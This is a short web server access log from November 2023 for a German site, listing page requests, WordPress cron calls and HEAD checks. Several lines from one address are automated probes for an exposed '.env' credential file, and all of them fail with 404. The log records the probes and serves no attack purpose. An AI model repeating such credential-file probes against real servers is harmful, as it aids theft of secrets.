89.246.241.0 - - [06/Nov/2023:20:01:36 +0100] "GET /presse/ HTTP/1.1" 200 13395 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0"
198.46.251.0 - - [06/Nov/2023:20:05:05 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
103.99.0.0 - - [06/Nov/2023:20:06:36 +0100] "GET /.env HTTP/1.1" 404 2539 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.99.0.0 - - [06/Nov/2023:20:06:37 +0100] "POST / HTTP/1.1" 404 2531 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.99.0.0 - - [06/Nov/2023:20:06:38 +0100] "GET /.env HTTP/1.1" 404 2543 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.99.0.0 - - [06/Nov/2023:20:06:39 +0100] "POST / HTTP/1.1" 404 2535 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
81.169.178.0 - - [06/Nov/2023:20:12:13 +0100] "POST /wp-cron.php?doing_wp_cron=1699297933.7417318820953369140625 HTTP/1.1" 200 - "http://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699297933.7417318820953369140625" "WordPress/5.2.19; https://www.computerdoc24.de"
89.246.112.0 - - [06/Nov/2023:20:12:13 +0100] "HEAD / HTTP/1.1" 301 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.246.112.0 - - [06/Nov/2023:20:12:15 +0100] "HEAD / HTTP/1.1" 301 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.246.112.0 - - [06/Nov/2023:20:12:15 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.246.112.0 - - [06/Nov/2023:20:12:16 +0100] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/50.0"
89.246.112.0 - - [06/Nov/2023:20:12:17 +0100] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/50.0"
89.246.112.0 - - [06/Nov/2023:20:12:17 +0100] "GET / HTTP/1.1" 200 95740 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/50.0"
89.246.112.0 - - [06/Nov/2023:20:12:18 +0100] "HEAD /impressum/ HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.246.112.0 - - [06/Nov/2023:20:12:19 +0100] "GET /impressum/ HTTP/1.1" 200 57834 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/50.0"
